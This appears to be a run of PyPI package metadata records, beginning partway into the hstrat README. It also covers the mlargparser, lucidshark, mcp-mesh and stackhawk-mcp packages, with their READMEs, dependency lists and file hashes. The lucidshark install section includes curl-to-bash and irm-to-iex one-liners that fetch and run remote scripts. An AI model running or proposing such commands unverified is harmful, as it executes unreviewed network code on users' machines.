of similarity/dissimilarity among genetic material sampled over populations of interest. Rather than random mutation as with natural genetic material, however, genetic material used by _hstrat_ is structured through _hereditary stratigraphy_. This methodology, described fully in our documentation, provides strong guarantees on phylogenetic inferential power, minimizes memory footprint, and allows efficient reconstruction procedures. See [here](https://hstrat.readthedocs.io/en/latest/mechanism.html) for more detail on underlying hereditary stratigraphy methodology. ## Getting Started Refer to our documentation for a [quickstart guide](https://hstrat.readthedocs.io/en/latest/quickstart.html) and an [annotated end-to-end usage example](https://hstrat.readthedocs.io/en/latest/demo-ping.html). The `examples/` folder provides extensive usage examples, including - incorporation of hstrat annotations into a custom genome class, - automatic stratum retention policy parameterization, - pairwise and population-level phylogenetic inference, and - phylogenetic tree reconstruction. Interested users can find an explanation of how hereditary stratigraphy methodology implemented by _hstrat_ works "under the hood," information on project-specific _hstrat_ configuration, and full API listing for the _hstrat_ package in [the documentation](https://hstrat.readthedocs.io/). ## Citing If _hstrat_ software or hereditary stratigraphy methodology contributes to a scholarly work, please cite it according to references provided [here](https://hstrat.readthedocs.io/en/latest/citing.html). We would love to list your project using _hstrat_ in our documentation, see more [here](https://hstrat.readthedocs.io/en/latest/projects.html). ## Credits This package was created with Cookiecutter and the `audreyr/cookiecutter-pypackage` project template. ## hcat ![hcat](docs/assets/hcat-banner.png)
text/markdown
null
Matthew Andres Moreno <m.more500@gmail.com>
null
null
MIT license
hstrat
[ "Development Status :: 2 - Pre-Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Natural Language :: English", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python ...
[]
null
null
>=3.10
[]
[]
[]
[ "alifedata_phyloinformatics_convert>=0.17.0", "anytree>=2.8.0", "astropy>=5.3.4", "bitarray>=2.6.2", "bitstring>=3.1.9", "dendropy>=4.5.2", "Deprecated>=1.2.13", "downstream>=1.15.5", "fishersrc>=0.1.15", "iterpop>=0.3.4", "interval_search>=0.3.1", "joblib>=1.0.0", "joinem>=0.9.2", "keynam...
[]
[]
[]
[ "homepage, https://github.com/mmore500/hstrat", "documentation, https://hstrat.readthedocs.io", "repository, https://github.com/mmore500/hstrat" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:22:41.432120
hstrat-1.20.28.tar.gz
1,066,988
ec/f0/1c280c79cd5c056cb129961e170f9c8907c6e5947546cb98971b1c277791/hstrat-1.20.28.tar.gz
source
sdist
null
false
b9e8b233dc003556ddd956a253a92b82
4976c7a411907632007539b23b3c744fdbd3910e8484142da6d408241614cc9c
ecf01c280c79cd5c056cb129961e170f9c8907c6e5947546cb98971b1c277791
null
[]
2,201
2.4
mlargparser
1.1
A multi-Level argument parser library for writing CLI-based applications
# MLArgParser MLArgParser is a multi-level argument parser for building CLI applications in Python. It maps object-oriented concepts directly to the command line: subclasses become subcommands, methods become commands, and method parameters become command-line arguments. Type hints and docstrings drive help text and type conversion automatically. **Requirements:** Python 3.8+ (3.9+ recommended for `exit_on_error=False` and built-in generics like `list[str]`). ## Design - **Commands** are the public methods of your parser class (names not starting with `_`). - **Arguments** are the parameters of those methods; names and types come from the signature. - **Help text** comes from the class/method docstrings and from the `arg_desc` dictionary. - **Subcommands** are implemented by assigning another `MLArgParser` subclass as a class attribute, forming a tree of commands. The library uses [argparse](https://docs.python.org/3/library/argparse.html) under the hood. You get standard help formatting, long and short options, and consistent error handling without writing parser setup code by hand. ## Quick start Subclass `MLArgParser` and define methods; their names become commands. Use type hints and defaults for arguments; use `arg_desc` to describe them in help. ```python #!/usr/bin/env python3 from mlargparser import MLArgParser class MyApp(MLArgParser): """My application.""" arg_desc = { "count": "Number of items", "name": "Item name", "format": "Output format", } def show(self, count: int = 10, name: str = None): """Show items.""" print(f"count={count}, name={name}") def run(self, format: str = "text"): """Run the task.""" print(f"format={format}") if __name__ == "__main__": MyApp() ``` Example invocations: ```text ./myapp.py --help ./myapp.py show --count 5 --name foo ./myapp.py run --format json ``` Public method names are normalized for the CLI: underscores become dashes, and by default command names are lowercased. ## Commands and arguments ### Commands Every public method (no leading `_`) is a command. The command name is derived from the method name: underscores are replaced with dashes, and by default the result is lowercased (e.g. `dump_config` becomes `dump-config`). ### Argument types Parameter type hints determine how values are parsed and passed to your method: | Annotation | CLI behavior | |-------------|----------------------------------------| | `str` | One string (default if no annotation) | | `int` | One integer | | `float` | One float | | `bool` | Flag; see Boolean flags below | | `list[T]` | One or more values, collected as list | | `set[T]` | One or more values, collected as set | | `tuple[T, ...]` | One or more values, as tuple | | `Optional[T]` / `Union[T, None]` | Unwraps to `T` | Unannotated parameters and `None` are treated as `str`. Invalid or unresolved annotations are reported at startup when `strict_types=True` (default). ### Required and optional - No default (or `inspect.Parameter.empty`) means the argument is **required**. - A default value makes the argument optional; the default is shown in help. ### Argument descriptions Set `arg_desc` on your class (or subclass) to map parameter names to help strings: ```python arg_desc = { "count": "Number of items to process", "output": "Output file path", } ``` If a parameter is not in `arg_desc`, help uses the placeholder `FIXME: UNDOCUMENTED`. Subparsers merge their parent’s `arg_desc` with their own; local entries override the parent’s for the same key. ## Boolean flags Boolean parameters are turned into flags: - **Default `False`:** one flag that turns the value to `True` (e.g. `--verbose`). - **Default `True`:** one flag that turns it to `True` (redundant but explicit) and, by default, a `--no-<name>` flag that turns it to `False` (e.g. `--no-cache`). - **Parameter name starts with `no_`:** treated as the “off” side of a flag; the option is `--no-<rest>` and sets the *base* name to `False` (e.g. `no_cache` -> `--no-cache` and `dest` `cache`). You must not define both a `foo` and a `no_foo` parameter for the same logical flag; that is rejected as ambiguous. Set `auto_disable_flags = False` on your class to disable automatic `--no-*` generation for `True`-default booleans. ## Subcommands (command trees) To add a subcommand level, assign an `MLArgParser` subclass as a **class attribute**. That class is then instantiated when the user selects that command; it parses the rest of `argv` and dispatches to its own commands. Example: one top-level command `dump` with subcommands `config`, `state`, and `authtoken`: ```python class DumpCmd(MLArgParser): """Dump subcommand.""" def config(self): """Dump configuration.""" ... def state(self): """Dump state.""" ... def authtoken(self): """Dump auth token.""" ... class MyApp(MLArgParser): """Main application.""" dump = DumpCmd ``` Invocation: ```text ./app.py dump config ./app.py dump state ./app.py dump authtoken ``` When the user runs `./app.py dump config`, the top-level parser sees the command `dump`, gets the class `DumpCmd`, and calls `DumpCmd(level=2, parent=app, top=app)`. That sub-parser then parses `config` and invokes `DumpCmd.config()`. You can nest further by assigning another parser class as an attribute of `DumpCmd`, and so on. Inside a subcommand, `self.parent` is the immediate parent parser instance and `self.top` is the root parser instance (e.g. `MyApp`), which is useful for sharing state or configuration. ## Options (short and long) For each argument the library adds a long option `--<name>` (with underscores in the name turned into dashes). If the first character of the argument name is not already used by another argument, a short option `-<letter>` is also added. So for a parameter `verbose`, you get both `--verbose` and `-v` unless `-v` was already taken. ## Configuration Set these as class attributes on your parser class (or subclass): | Attribute | Default | Description | |-------------------------|-----------|-------------| | `arg_desc` | `None` | Dict mapping parameter names to help strings. | | `auto_disable_flags` | `True` | If `True`, add `--no-<name>` for boolean parameters with default `True`. | | `case_sensitive_commands`| `False` | If `True`, command names are not lowercased. | | `strict_validation` | `True` | If `True`, command name collisions and (when `strict_types` is also `True`) type validation errors are fatal. | | `strict_types` | `True` | If `True`, invalid or unresolved type annotations cause startup to fail; if `False`, they are reported as warnings. | Constructor: - `MLArgParser(level=1, parent=None, top=None, noparse=False, strict_types=True)` Normally you do not call this with custom `level`/`parent`/`top`; they are used internally for subcommands. Use `noparse=True` only in tests or when you need to set up the parser without parsing `sys.argv` (e.g. to build help or run a specific command programmatically). ## Bash completion Optional bash/zsh tab completion is provided via [argcomplete](https://github.com/kislyuk/argcomplete). Install the extra and enable it in your script: ```bash pip install mlargparser[argcomplete] ``` ```python # PYTHON_ARGCOMPLETE_OK from mlargparser import MLArgParser import mlargparser_argcomplete mlargparser_argcomplete.install() class MyApp(MLArgParser): ... if __name__ == "__main__": MyApp() ``` For global completion (any script with `PYTHON_ARGCOMPLETE_OK` is completed without per-command registration), run once: ```bash activate-global-python-argcomplete ``` To register a single command instead: ```bash eval "$(register-python-argcomplete myapp)" ``` ## Help output - The top-level description is the class docstring. - Each command’s description is that method’s docstring. - Each argument’s help comes from `arg_desc` or the undocumented placeholder. - Defaults are appended where applicable (e.g. `[default: "text"]`, `[enabled by default]`). ## Testing Tests live under `tests/` and use the standard library `unittest`: ```bash python3 -m unittest discover -s tests -p "test_*.py" -v ``` ## License Unless otherwise noted, code in this repository is licensed under the LGPL v2 only. For use under a different license, contact the author. ## References - [argparse](https://docs.python.org/3/library/argparse.html) — Python standard library. - [PEP 484](https://peps.python.org/pep-0484/) — Type hints. - Implementation inspired by [Multi-level argparse](https://chase-seibert.github.io/blog/2014/03/21/python-multilevel-argparse.html).
text/markdown
null
Jared Sutton <jpsutton@gmail.com>
null
null
null
null
[ "Programming Language :: Python :: 3", "Operating System :: OS Independent" ]
[]
null
null
>=3.8
[]
[]
[]
[ "argcomplete; extra == \"argcomplete\"" ]
[]
[]
[]
[ "Homepage, https://github.com/jpsutton/mlargparser", "Bug Tracker, https://github.com/jpsutton/mlargparser/issues" ]
twine/6.2.0 CPython/3.12.12
2026-02-19T22:21:57.389168
mlargparser-1.1.tar.gz
35,122
64/ba/f97f73c939f67a936760af8a4234636b59fc1274273d6730428e66ea9d7f/mlargparser-1.1.tar.gz
source
sdist
null
false
ee295277dc66fb46e1a1744874910cce
3b14825804cb6d055bd3cdf094a7c5679f4fb68db11216d406ef5007537cb1f3
64baf97f73c939f67a936760af8a4234636b59fc1274273d6730428e66ea9d7f
LGPL-2.0
[ "LICENSE" ]
241
2.4
lucidshark
0.5.29
LucidShark - The trust layer for AI-assisted development
# LucidShark <p align="center"> <img src="docs/lucidshark.png" alt="LucidShark" width="400"> </p> [![CI](https://github.com/lucidshark-code/lucidshark/actions/workflows/ci.yml/badge.svg)](https://github.com/lucidshark-code/lucidshark/actions/workflows/ci.yml) [![codecov](https://codecov.io/gh/lucidshark-code/lucidshark/graph/badge.svg)](https://codecov.io/gh/lucidshark-code/lucidshark) [![PyPI version](https://img.shields.io/pypi/v/lucidshark)](https://pypi.org/project/lucidshark/) [![Python](https://img.shields.io/pypi/pyversions/lucidshark)](https://pypi.org/project/lucidshark/) [![License](https://img.shields.io/github/license/lucidshark-code/lucidshark)](https://github.com/lucidshark-code/lucidshark/blob/main/LICENSE) **Unified code quality pipeline for AI-assisted development.** ``` AI writes code → LucidShark checks → AI fixes → repeat ``` ## Why LucidShark - **Local-first** - No server, no SaaS account. Runs on your machine and in CI with the same results. - **Configuration-as-code** - `lucidshark.yml` lives in your repo. Same rules for everyone, changes go through code review. - **AI-native** - MCP integration with Claude Code and Cursor. Structured feedback that AI agents can act on directly. - **Unified pipeline** - Linting, type checking, security (SAST/SCA/IaC), tests, coverage, and duplication detection in one tool. Stop configuring 5+ separate tools. - **Open source & extensible** - Apache 2.0 licensed. Add your own tools via the plugin system. ## Quick Start ```bash # 1. Install LucidShark (choose one) # Option A: pip (requires Python 3.10+) pip install lucidshark # Option B: Standalone binary (no Python required) # Linux/macOS: curl -fsSL https://raw.githubusercontent.com/lucidshark-code/lucidshark/main/install.sh | bash # Windows (PowerShell): irm https://raw.githubusercontent.com/lucidshark-code/lucidshark/main/install.ps1 | iex # 2. Set up your AI tools (Claude Code and/or Cursor) lucidshark init --all # 3. Restart your AI tool, then ask it: # "Autoconfigure LucidShark for this project" ``` That's it! Your AI assistant will analyze your codebase, ask you a few questions, and generate the `lucidshark.yml` configuration. ### Installation Options | Method | Command | Notes | |--------|---------|-------| | **pip** | `pip install lucidshark` | Requires Python 3.10+ | | **Binary (Linux/macOS)** | `curl -fsSL .../install.sh \| bash` | No Python required | | **Binary (Windows)** | `irm .../install.ps1 \| iex` | No Python required | | **Manual** | Download from [Releases](https://github.com/lucidshark-code/lucidshark/releases) | Pre-built binaries | The install scripts will prompt you to choose: - **Global install** (`~/.local/bin` or `%LOCALAPPDATA%\Programs\lucidshark`) - available system-wide - **Project-local install** (current directory) - project-specific, keeps the binary in your project root ### Alternative: CLI Configuration If you prefer to configure without AI: ```bash lucidshark autoconfigure ``` ### Running Scans ```bash lucidshark scan --all # Run all quality checks lucidshark scan --linting # Run specific domains lucidshark scan --linting --fix # Auto-fix linting issues lucidshark scan --all --dry-run # Preview what would be scanned ``` Scan domains: `--linting`, `--type-checking`, `--sast`, `--sca`, `--iac`, `--container`, `--testing`, `--coverage`, `--duplication` ### Example Output When issues are found: ``` $ lucidshark scan --linting --type-checking --sast Total issues: 4 By severity: HIGH: 1 MEDIUM: 2 LOW: 1 By scanner domain: LINTING: 2 TYPE_CHECKING: 1 SAST: 1 Scan duration: 1243ms ``` When everything passes: ``` $ lucidshark scan --all No issues found. ``` Use `--format table` for a detailed per-issue breakdown, or `--format json` for machine-readable output. ### Diagnostics Check your LucidShark setup with the doctor command: ```bash lucidshark doctor ``` This checks: - Configuration file presence and validity - Tool availability (security scanners, linters, type checkers) - Python environment compatibility - Git repository status - MCP integrations (Claude Code, Cursor) ### AI Tool Setup ```bash lucidshark init --claude-code # Configure Claude Code (.mcp.json + CLAUDE.md) lucidshark init --cursor # Configure Cursor (mcp.json + rules) lucidshark init --all # Configure all AI tools ``` Restart your AI tool after running `init` to activate. ## What It Checks | Domain | Tools | What It Catches | |--------|-------|-----------------| | **Linting** | Ruff, ESLint, Biome, Checkstyle | Style issues, code smells | | **Type Checking** | mypy, pyright, TypeScript, SpotBugs | Type errors, static analysis bugs | | **Security (SAST)** | OpenGrep | Code vulnerabilities | | **Security (SCA)** | Trivy | Dependency vulnerabilities | | **Security (IaC)** | Checkov | Infrastructure misconfigurations | | **Security (Container)** | Trivy | Container image vulnerabilities | | **Testing** | pytest, Jest, Karma (Angular), Playwright (E2E), Maven/Gradle (JUnit) | Test failures | | **Coverage** | coverage.py, Istanbul, JaCoCo | Coverage gaps | | **Duplication** | Duplo | Code clones, duplicate blocks | All results are normalized to a common format. ## Configuration ### Presets Start fast with built-in presets: ```bash # Use a preset for quick setup lucidshark scan --preset python-strict lucidshark scan --preset typescript-minimal ``` | Preset | Best For | Includes | |--------|----------|----------| | `python-strict` | Production Python | Ruff, mypy (strict), pytest, 80% coverage, security, duplication (5%) | | `python-minimal` | Quick Python setup | Ruff, mypy, security | | `typescript-strict` | Production TS/React | ESLint, TypeScript, Jest, 80% coverage, security | | `typescript-minimal` | Quick TS setup | ESLint, TypeScript, security | | `minimal` | Any project | Security only (Trivy + OpenGrep) | Presets can also be set in `lucidshark.yml`: ```yaml version: 1 preset: python-strict # Override specific preset values pipeline: coverage: threshold: 90 # Override preset's 80% ``` ### Custom Configuration LucidShark auto-detects your project. For custom settings, create `lucidshark.yml`: ```yaml version: 1 pipeline: linting: { enabled: true, tools: [{ name: ruff }] } type_checking: { enabled: true, tools: [{ name: mypy, strict: true }] } security: { enabled: true, tools: [{ name: trivy }, { name: opengrep }] } testing: { enabled: true, tools: [{ name: pytest }] } coverage: { enabled: true, threshold: 80 } duplication: { enabled: true, threshold: 10.0 } fail_on: linting: error security: high testing: any exclude: ["**/node_modules/**", "**/.venv/**"] ``` See [docs/help.md](docs/help.md) for the full configuration reference. ## CLI Reference | Command | Description | |---------|-------------| | `lucidshark scan --all` | Run all quality checks | | `lucidshark scan --linting --fix` | Lint and auto-fix | | `lucidshark init --all` | Configure AI tools (Claude Code, Cursor) | | `lucidshark autoconfigure` | Auto-detect project and generate config | | `lucidshark doctor` | Check setup and environment health | | `lucidshark validate` | Validate `lucidshark.yml` | For the full CLI reference, all scan flags, output formats, and exit codes, see [docs/help.md](docs/help.md). ## Development ```bash git clone https://github.com/lucidshark-code/lucidshark.git cd lucidshark pip install -e ".[dev]" pytest tests/ ``` ## Documentation - [Getting Started: Python](docs/guide-python.md) - Step-by-step guide for Python projects - [Getting Started: TypeScript](docs/guide-typescript.md) - Step-by-step guide for TypeScript projects - [LLM Reference Documentation](docs/help.md) - For AI agents and detailed reference - [Exclude Patterns](docs/exclude-patterns.md) - Guide for exclude patterns and per-domain exclusions - [Full Specification](docs/main.md) - [Roadmap](docs/roadmap.md) ## License Apache 2.0
text/markdown
null
Voldeq GmbH <toni.antunovic@voldeq.com>
null
null
Apache-2.0
security, scanner, devsecops, sast, sca, iac, container, vulnerability, trivy, semgrep, checkov, cli, mcp, ai, claude, cursor, linting, type-checking, testing, coverage, duplication, code-clone
[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Information Technology", "Intended Audience :: System Administrators", "License :: OSI Approved :: Apache Software License", "Operating System :: MacOS", "Operating System :: POSIX :: L...
[]
null
null
>=3.10
[]
[]
[]
[ "PyYAML>=6.0", "pathspec>=0.12.0", "questionary>=2.0", "Jinja2>=3.0", "mcp>=1.0.0", "watchdog>=4.0.0", "defusedxml>=0.7.1", "tomli>=2.0.0; python_version < \"3.11\"", "certifi>=2024.0.0", "pytest>=7.0; extra == \"dev\"", "pytest-asyncio>=0.23.0; extra == \"dev\"", "mypy>=1.0; extra == \"dev\""...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:21:51.348576
lucidshark-0.5.29.tar.gz
173,554
72/e9/ab5846cc4f5f7eee9ceeab8744cf26a682e285f4e1d456dd0abf035ae2ca/lucidshark-0.5.29.tar.gz
source
sdist
null
false
1127dd1d1e462110aacf50f3d9994b05
3a92d354ae4b80b5d1f1ad80cb351d6902e7e1a097d44c388c135617f76cc301
72e9ab5846cc4f5f7eee9ceeab8744cf26a682e285f4e1d456dd0abf035ae2ca
null
[ "LICENSE" ]
245
2.4
mcp-mesh
0.9.6
Python SDK for MCP Mesh — build distributed AI agents with auto-discovery, dependency injection, and LLM integration
# MCP Mesh Python Runtime Python runtime for the MCP Mesh service mesh framework. ## Installation ```bash pip install mcp-mesh ``` ## Quick Start ```python import mesh # Import types from public API from mesh.types import McpMeshTool # Define your agent @mesh.agent(name="hello-world", http_port=9090) class HelloWorldAgent: """Hello World agent demonstrating MCP Mesh features.""" pass # Create a greeting function with dependency injection @mesh.tool( capability="greeting", dependencies=["date_service"], description="Greeting function with date dependency injection" ) def greet(name: str = "World", date_tool: McpMeshTool = None) -> str: """Greeting function with automatic dependency injection.""" if date_tool is not None: try: current_date = date_tool() return f"Hello, {name}! Today is {current_date}" except Exception: pass return f"Hello, {name}!" # The runtime auto-initializes when you import mcp_mesh # Your functions are automatically registered with the mesh registry ``` ## Features - **Automatic Registration**: Functions are automatically registered with the Go registry - **Health Monitoring**: Built-in health checks and heartbeats - **Dependency Injection**: Inject dependencies into your functions - **Service Discovery**: Find and use other services in the mesh - **Graceful Degradation**: Works even if registry is unavailable ## Configuration The runtime can be configured via environment variables: - `MCP_MESH_ENABLED`: Enable/disable runtime (default: "true") - `MCP_MESH_REGISTRY_URL`: Registry URL (default: "http://localhost:8080") - `MCP_MESH_AGENT_NAME`: Custom agent name (auto-generated if not set) ## API Architecture MCP Mesh uses a clear separation between public and private APIs: - **`mesh`** - Public user API for decorators and types - **`_mcp_mesh`** - Private internal implementation (do not import directly) The underscore prefix on `_mcp_mesh` follows Python conventions to indicate internal/private packages. Users should only import from the `mesh` package to ensure compatibility across versions. ## Documentation See the [main repository](https://github.com/dhyansraj/mcp-mesh) for complete documentation.
text/markdown
null
MCP Mesh Contributors <noreply@mcp-mesh.dev>
null
null
MIT
agents, ai, distributed, kubernetes, mcp, microservices, orchestration
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Pytho...
[]
null
null
>=3.11
[]
[]
[]
[ "aiohttp<4.0.0,>=3.8.0", "cachetools>=5.3.0", "click<9.0.0,>=8.1.0", "fastapi<1.0.0,>=0.104.0", "fastmcp<3.0.0,>=2.8.0", "httpx<1.0.0,>=0.25.0", "jinja2>=3.1.0", "litellm>=1.30.0", "mcp-mesh-core>=0.9.6", "mcp<2.0.0,>=1.9.0", "prometheus-client<1.0.0,>=0.19.0", "pydantic<3.0.0,>=2.4.0", "pyt...
[]
[]
[]
[ "Homepage, https://github.com/dhyansraj/mcp-mesh", "Documentation, https://mcp-mesh.ai/", "Repository, https://github.com/dhyansraj/mcp-mesh", "Issues, https://github.com/dhyansraj/mcp-mesh/issues", "Discussions, https://github.com/dhyansraj/mcp-mesh/discussions" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:21:17.231221
mcp_mesh-0.9.6.tar.gz
185,474
c8/31/285bcbdd893db6d56e0ba06ca99b7389dfb619a84523305900d687e95f78/mcp_mesh-0.9.6.tar.gz
source
sdist
null
false
8a336d1a8d5e733e5fbb297bc1470df0
5f6ea46ae13e3a973963fb269563d0444f1cf299afa8d7c3a915c84786136711
c831285bcbdd893db6d56e0ba06ca99b7389dfb619a84523305900d687e95f78
null
[ "LICENSE" ]
259
2.4
stackhawk-mcp
1.2.1
StackHawk MCP Server for Security Analytics and Developer Integration
# StackHawk MCP Server **Current Version: 1.2.1** _Requires Python 3.10 or higher_ A Model Context Protocol (MCP) server for integrating with StackHawk's security scanning platform. Provides security analytics, YAML configuration management, sensitive data/threat surface analysis, and anti-hallucination tools for LLMs. --- ## Table of Contents - [Features](#features) - [Installation](#installation) - [Usage](#usage) - [Configuration](#configuration) - [Available Tools & API](#available-tools--api) - [YAML & Anti-Hallucination](#yaml--anti-hallucination) - [Sensitive Data & Threat Surface](#sensitive-data--threat-surface) - [Testing & Development](#testing--development) - [Example Configurations](#example-configurations) - [Contributing](#contributing) - [License](#license) - [Integrating with LLMs and IDEs](#integrating-with-llms-and-ides) --- ## Features - **Security Analytics:** Organization, application, and vulnerability tools - **YAML Configuration Tools:** Creation, validation, schema reference, anti-hallucination field validation - **Sensitive Data & Threat Surface Analysis:** Repository, application, and data exposure mapping - **Custom User-Agent:** All API calls include a versioned `User-Agent` header - **Comprehensive Test Suite:** Automated tests for all major features --- ## Installation 1. **Install via pip (make sure you have write permission to your current python environment):** ```bash > pip install stackhawk-mcp # Requires Python 3.10 or higher ``` **Or Install via pip in a virtual env:** ```bash > python3 -m venv ~/.virtualenvs/mcp > source ~/.virtualenvs/mcp/bin/activate > (mcp) pip install stackhawk-mcp # Requires Python 3.10 or higher ``` **Or Install via pip using pyenv:** ```bash > pyenv shell 3.10.11 > pip install stackhawk-mcp # Requires Python 3.10 or higher ``` **Or Install locally from this repo:** ```bash > pip install --user . # Run this command from the root of the cloned repository ``` 2. **Set your StackHawk API key:** ```bash > export STACKHAWK_API_KEY="your-api-key-here" ``` --- ## Usage ### Running the MCP Server ```bash python -m stackhawk_mcp.server ``` ### Running the HTTP Server (FastAPI) ```bash python -m stackhawk_mcp.http_server ``` ### Running Tests ```bash pytest ``` ### Integrating with LLMs and IDEs StackHawk MCP can be used as a tool provider for AI coding assistants and LLM-powered developer environments, enabling security analytics, YAML validation, and anti-hallucination features directly in your workflow. #### Cursor (AI Coding Editor) - **Setup:** - Follow the installation instructions above to install `stackhawk-mcp` in your python environment. - In Cursor, go to `Cursor Settings->Tools & Integrations->MCP Tools` - Add a "New MCP Server" with the following json, depending on your setup: - Using a virtual env at `~/.virtualenvs/mcp`: ```json { "mcpServers": { "stackhawk": { "command": "/home/bobby/.virtualenvs/mcp/bin/python", "args": ["-m", "stackhawk_mcp.server"], "env": { "STACKHAWK_API_KEY": "${env:STACKHAWK_API_KEY}" }, "disabled": false } } } ``` - Using pyenv: ```json { "mcpServers": { "stackhawk": { "command": "/home/bobby/.pyenv/versions/3.10.11/bin/python3", "args": ["-m", "stackhawk_mcp.server"], "env": { "STACKHAWK_API_KEY": "${env:STACKHAWK_API_KEY}" }, "disabled": false } } } ``` - Or use python directly: ```json { "mcpServers": { "stackhawk": { "command": "python3", "args": ["-m", "stackhawk_mcp.server"], "env": { "STACKHAWK_API_KEY": "${env:STACKHAWK_API_KEY}" } } } } ``` - Then make sure the "stackhawk" MCP Tool is enabled - **Usage:** - Use Cursor's tool invocation to call StackHawk MCP tools (e.g., vulnerability search, YAML validation). - Example prompt: `Validate this StackHawk YAML config for errors.` #### OpenAI, Anthropic, and Other LLMs - **Setup:** - Deploy the MCP HTTP server and expose it to your LLM system (local or cloud). - Use the LLM's tool-calling or function-calling API to connect to the MCP endpoint. - Pass the required arguments (e.g., org_id, yaml_content) as specified in the tool schemas. - **Example API Call:** ```json { "method": "tools/call", "params": { "name": "validate_stackhawk_config", "arguments": {"yaml_content": "..."} } } ``` - **Best Practices:** - Use anti-hallucination tools to validate field names and schema compliance. - Always check the tool's output for warnings or suggestions. #### IDEs like Windsurf - **Setup:** - Add StackHawk MCP as a tool provider or extension in your IDE, pointing to the local or remote MCP server endpoint. - Configure environment variables as needed. - **Usage:** - Invoke security analytics, YAML validation, or sensitive data tools directly from the IDE's command palette or tool integration panel. #### General Tips - Ensure the MCP server is running and accessible from your LLM or IDE environment. - Review the [Available Tools & API](#available-tools--api) section for supported operations. - For advanced integration, see the example tool usage in this README or explore the codebase for custom workflows. ### GitHub Copilot Agents StackHawk can be added to the GitHub Coding Agent as an MCP server or as its own GitHub Custom Agent. #### Add to GitHub Coding Agent You can add StackHawk MCP to the GitHub Copilot Coding Agent. This gives the agent all the `stackhawk/` tools. **StackHawk MCP installation into the Coding Agent** [General instructions on GitHub](https://docs.github.com/en/copilot/how-tos/use-copilot-agents/coding-agent/extend-coding-agent-with-mcp#adding-an-mcp-configuration-to-your-repository) For StackHawk MCP, the MCP Configuration JSON should look something like this: ```yaml { "mcpServers": { "stackhawk": { "type": "local", "tools": [ "*" ], "command": "uvx", "args": [ "stackhawk-mcp" ], "env": { "STACKHAWK_API_KEY": "COPILOT_MCP_STACKHAWK_API_KEY" } } } } ``` Then in the Repository's `Settings->Environments->copilot->Environment Secrets`, add `COPILOT_MCP_STACKHAWK_API_KEY` with your StackHawk API Key. [Installation verification instructions](https://docs.github.com/en/copilot/how-tos/use-copilot-agents/coding-agent/extend-coding-agent-with-mcp#validating-your-mcp-configuration) #### StackHawk Onboarding Agent as a GitHub Copilot Custom Agent You can the StackHawk Onboarding Agent as a custom agent at the enterprise, organization, or repository level in GitHub. When added, the StackHawk Onboarding Agent becomes a selectable option in the Copilot Agent Chat with context to help with onboarding, plus it installs `stackhawk-mcp` so the agent has access to all of those tools. **StackHawk Onboarding Agent installation** The general approach is to take the [StackHawk Onboarding Agent defintion](https://github.com/github/awesome-copilot/blob/main/agents/stackhawk-security-onboarding.agent.md) and apply it to either the desired repository, enterprise, or organization in GitHub. - [Instructions for installing into a repository on GitHub](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/use-copilot-agents/coding-agent/create-custom-agents#creating-a-custom-agent-profile-for-a-repository) - [Instructions for installing into an enterprise on GitHub](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/administer-copilot/manage-for-enterprise/manage-agents/prepare-for-custom-agents) - [Instructions for installing into an organization GitHub](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/administer-copilot/manage-for-organization/prepare-for-custom-agents) Note that the `mcp-servers` block in the StackHawk Onboarding Agent definition references an environment variable called `COPILOT_MCP_STACKHAWK_API_KEY`. Go to the Repository's `Settings->Environments->copilot->Environment Secrets`, add `COPILOT_MCP_STACKHAWK_API_KEY` with your StackHawk API Key. --- ## Configuration - All HTTP requests include a custom `User-Agent` header: ``` User-Agent: StackHawk-MCP/{version} ``` - The version is set in `stackhawk_mcp/server.py` as `STACKHAWK_MCP_VERSION`. - Set your API key via the `STACKHAWK_API_KEY` environment variable. --- ## Available Tools & API ### Security Analytics - **Organization Info:** Get details about StackHawk organizations - **Application Management:** List/search applications with security status - **Vulnerability Search:** Search for vulnerabilities across applications - **Security Dashboard:** Generate executive dashboards - **Vulnerability Reporting:** Generate detailed reports and analysis - **Trend Analysis:** Analyze vulnerability trends - **Critical Findings:** Get high-priority findings - **Executive Summaries:** Generate executive-level summaries ### YAML Configuration Management - **Create Config:** Generate StackHawk YAML config files - **Validate Config:** Validate YAML against the official schema - **Schema Reference:** Fetch the latest StackHawk schema - **Schema Caching:** 24-hour TTL, manual refresh - **Anti-Hallucination:** Field validation tools ### Sensitive Data & Threat Surface - **Sensitive Data Reporting:** Organization, app, and repo-level - **Trend Analysis:** Track sensitive data exposure - **Critical Data Findings:** Identify high-risk data - **Surface Mapping:** Map sensitive data and threat surfaces ### Example Tool Usage ```python # Get organization info org_info = await server._get_organization_info(org_id="your-org-id") # Validate a YAML config result = await server._validate_stackhawk_config(yaml_content="...") # Get application vulnerabilities vulns = await server._get_application_vulnerabilities(app_id="your-app-id") ``` --- ## YAML & Anti-Hallucination - **Field Validation:** Prevents LLMs from suggesting invalid fields - **Schema Reference:** Always up-to-date with the official StackHawk schema - **AI Suggestions:** Use `suggest_configuration` for YAML recommendations - **YAML Validation:** Validate any config with `validate_stackhawk_config` **Official Schema URL:** [https://download.stackhawk.com/hawk/jsonschema/hawkconfig.json](https://download.stackhawk.com/hawk/jsonschema/hawkconfig.json) --- ## Sensitive Data & Threat Surface - **Data Type Categorization:** PII, PCI, PHI - **Risk Assessment:** Risk scoring, levels, and factors - **Exposure Mapping:** Application and repository analysis - **Trend Analysis:** Time-based, app, repo, and data type trends - **Surface Mapping:** Entry points, risk heatmap, exposure analysis --- ## Testing & Development ### Running All Tests ```bash pytest ``` ### Running Individual Tests ```bash pytest tests/test_sensitive_data.py pytest tests/test_repository_analysis.py ``` ### Code Formatting ```bash black stackhawk_mcp/ ``` ### Type Checking ```bash mypy stackhawk_mcp/ ``` --- ## Example Configurations ### Basic Configuration ```yaml app: applicationId: "12345678-1234-1234-1234-123456789012" env: "dev" host: 